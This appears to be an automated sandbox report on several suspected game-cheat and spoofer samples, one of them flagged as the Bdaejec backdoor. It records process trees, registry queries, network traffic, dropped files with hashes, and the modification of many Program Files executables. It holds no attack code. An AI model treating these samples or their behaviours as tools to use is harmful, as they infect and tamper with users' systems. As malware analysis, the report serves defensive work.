US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/4396-0-0x00000000743BE000-0x00000000743BF000-memory.dmp

memory/4396-1-0x0000000000A00000-0x0000000000A0E000-memory.dmp

memory/4396-2-0x00000000743B0000-0x0000000074B61000-memory.dmp

memory/4396-3-0x00000000743BE000-0x00000000743BF000-memory.dmp

memory/4396-4-0x00000000743B0000-0x0000000074B61000-memory.dmp

memory/4396-5-0x00000000743B0000-0x0000000074B61000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

96s

Max time network

146s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Deadly.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5972 wrote to memory of 5744 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 5972 wrote to memory of 5744 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 5972 wrote to memory of 5744 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Deadly.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Deadly.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5744 -ip 5744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 576

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5744 -ip 5744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 808

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

149s

Max time network

156s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ZeroHack.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4696 wrote to memory of 2660 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4696 wrote to memory of 2660 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4696 wrote to memory of 2660 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ZeroHack.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ZeroHack.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

149s

Max time network

156s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\gamesnus.dll,#1

Signatures

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1544 wrote to memory of 1636 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1544 wrote to memory of 1636 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1544 wrote to memory of 1636 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\gamesnus.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\gamesnus.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 216.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
SE 192.229.221.95:80 tcp

Files

memory/1636-0-0x0000000074880000-0x0000000074D13000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

148s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe"

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_ZeroHackSafe.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 201.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/4340-0-0x00007FF6820D9000-0x00007FF682442000-memory.dmp

memory/4340-1-0x00007FFBD0150000-0x00007FFBD0152000-memory.dmp

memory/4340-2-0x00007FFBD0160000-0x00007FFBD0162000-memory.dmp

memory/4340-4-0x00007FF6820D0000-0x00007FF68297F000-memory.dmp

memory/4340-5-0x00007FF6820D9000-0x00007FF682442000-memory.dmp

memory/4340-6-0x00007FF6820D0000-0x00007FF68297F000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

90s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Spoofer.exe"

C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe

"C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 216.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

memory/4988-0-0x00007FF8CFA93000-0x00007FF8CFA95000-memory.dmp

memory/4988-1-0x0000000000BA0000-0x0000000000D06000-memory.dmp

memory/4988-2-0x00007FF8CFA90000-0x00007FF8D0552000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.exe

MD5 6606c3f98d9f8fae5e9c5337eec434c4
SHA1 ea0d27f6ee5c7d5a97cdaebac02e48da5a17e577
SHA256 a48b56504cd8581af88cf3d4dd61549e3d00573318962ab1c3af53aef723c337
SHA512 7e8787c296123cf0306adc5e545119bb345b4f267beb03a5657eeb4d59673eeac05c04307abeb9dc1cd91290f71736d6d8991049eddacdda44f9cf6c6b631599

C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.runtimeconfig.json

MD5 9db099f143ead47e224653d0dde19fe9
SHA1 d050db767fc64aa1705353132da3e35048475d3c
SHA256 7e79af92820e50910b90f1cade2728f45987393f24b50e384dc225d9773b7194
SHA512 579c3c870903b3d47dbc2567153fa7c73e0aa47387c6969b8982037884033a4b25de702e0efb8c7ae717b6b463192b917b18a79b1ef5f8c969f257422af2b65f

C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.deps.json

MD5 1f8022d231b0c479e19eb86a10312c4f
SHA1 eebe57abb1999de25b03fb23c6247e420c3f355b
SHA256 86c9558da38267d785e4f6d78056778b673aaed42cbd8f704b1dd64811d08f3d
SHA512 3c14143d5d9d60f9c8f572276c4f6d0ee0712760ce63fddae620f099fdf46e28f15f929584737e3cb028fffa4ba2819550f66a68f90cc8a3a2ebdbf9d7dfbd94

memory/4988-27-0x00007FF8CFA90000-0x00007FF8D0552000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MontanaSpoofer.dll

MD5 d0902a9df335a37f1dd5ad5ce1223928
SHA1 e1526d6ecc8c293333a6d6b813260349a18b140f
SHA256 275c1257d4c2dacc787f3f80f2cdc2328552f09d8c87b5b6226a9cd712dd8f0b
SHA512 4d1c655a4cd44c0e3e28234ab87c4f0331d02a5ee9c4d340dd6c4b765d88b27ddcced490bec9010cfd5ea6376ce45c1d7143656998ee2018b3516a1c36d3e218

memory/948-29-0x0000012599030000-0x0000012599031000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll

MD5 b429ae86c5be521bc8ca3b164cec3acb
SHA1 387560073ff5a1f2191abc6f75fc34532bbb6dd2
SHA256 3ac70532408b89159bfe235d4ed228faa03ae3fbd63ec6a82d895f287a3b0579
SHA512 eae65de53da50708983ed8ebf9e1e3dd5f9aea95a354d272e199bb59517f62bfe35f0df7a37d81ab0423d0d6d29304fa70284c731bd54023e446b2c19bacafb1

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

97s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe"

Signatures

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\ExecuteSafe.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 201.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/2388-0-0x00007FF72AC70000-0x00007FF72B1E2000-memory.dmp

memory/2388-1-0x00007FF955DB1000-0x00007FF955DB3000-memory.dmp

memory/2388-3-0x00007FF72AC70000-0x00007FF72B1E2000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

149s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe"

Signatures

Bdaejec

backdoor bdaejec

Bdaejec family

bdaejec

Detects Bdaejec Backdoor.

Description Indicator Process Target
N/A N/A N/A N/A

Stops running service(s)

evasion execution

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\Integrator.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javah.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jps.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstat.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstatd.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jhat.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\ktab.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\misc.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\kinit.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javadoc.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ORGCHART.EXE C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXE C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateOnDemand.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseNdr.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javapackager.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Windows Defender\NisSrv.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseGPParser.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseCM.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\Install\{FE07C881-CD99-4B87-9410-B9C83C0E2377}\chrome_installer.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\extcheck.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\idlj.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\pack200.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\keytool.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\klist.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\unpack200.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
